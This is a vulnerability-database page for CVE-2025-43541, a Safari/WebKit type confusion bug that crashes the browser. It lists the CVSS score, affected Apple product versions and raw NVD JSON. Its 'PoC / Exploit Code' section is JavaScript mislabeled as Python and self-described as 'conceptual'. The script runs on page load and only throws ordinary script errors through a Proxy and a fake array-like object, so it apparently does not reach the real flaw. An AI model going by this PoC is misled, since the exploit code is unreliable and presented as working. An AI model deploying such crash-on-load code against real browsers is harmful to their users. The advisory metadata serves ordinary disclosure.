Security Vulnerability Report
中文
CVE-2025-43541 CVSS 4.3 MEDIUM

CVE-2025-43541

Published: 2025-12-17 21:16:13
Last Modified: 2025-12-18 19:06:51
Source: [email protected]

Description

A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected Safari crash.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.2
iOS < 18.7.3
iOS < 26.2
iPadOS < 18.7.3
iPadOS < 26.2
macOS Tahoe < 26.2
visionOS < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-43541 Type Confusion PoC // This PoC demonstrates the type confusion vulnerability in Safari's WebKit // Note: This is a conceptual PoC based on the vulnerability description function triggerTypeConfusion() { // Create objects that may trigger type confusion in state handling const target = {}; // Use Proxy to manipulate object behavior const handler = { get: function(obj, prop) { // Attempt to trigger type confusion through proxy if (prop === 'constructor') { return function() { // Force type confusion through constructor manipulation return { toString: () => { throw new Error('Type confusion'); } }; }; } return obj[prop]; } }; const proxied = new Proxy(target, handler); // Trigger the vulnerability through type coercion try { // Force type confusion through implicit type conversion const result = String(proxied); console.log('Type confusion triggered'); } catch (e) { console.error('PoC executed, potential crash:', e.message); } // Additional trigger method using array-like object confusion const fakeArray = { length: 'malicious_string', 0: { valueOf: () => { throw new Error('Crash'); } } }; // Attempt to trigger crash through array method confusion Array.prototype.slice.call(fakeArray); } // Execute when page loads if (document.readyState === 'complete') { triggerTypeConfusion(); } else { window.addEventListener('load', triggerTypeConfusion); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43541", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:12.680", "lastModified": "2025-12-18T19:06:51.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A type confusion issue was addressed with improved state handling. This issue is fixed in Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Processing maliciously crafted web content may lead to an unexpected Safari crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "3ECBF838-536C-47F9-9876-C526B8ED32EC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "6547722A-1226-4E23-B3AE-8692B07C2657"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "8B71D919-1AA2-4F17-A834-4B703E36F7E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.3", "matchCriteriaId": "8928A377-93BD-49AD-B4FE-5B2328EBDB70"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "10FD01C3-D77F-4FE4-8195-F2C59FB1321C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EB10D901-4800-4DF9-AB35-48017C178161"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125885", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125892", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.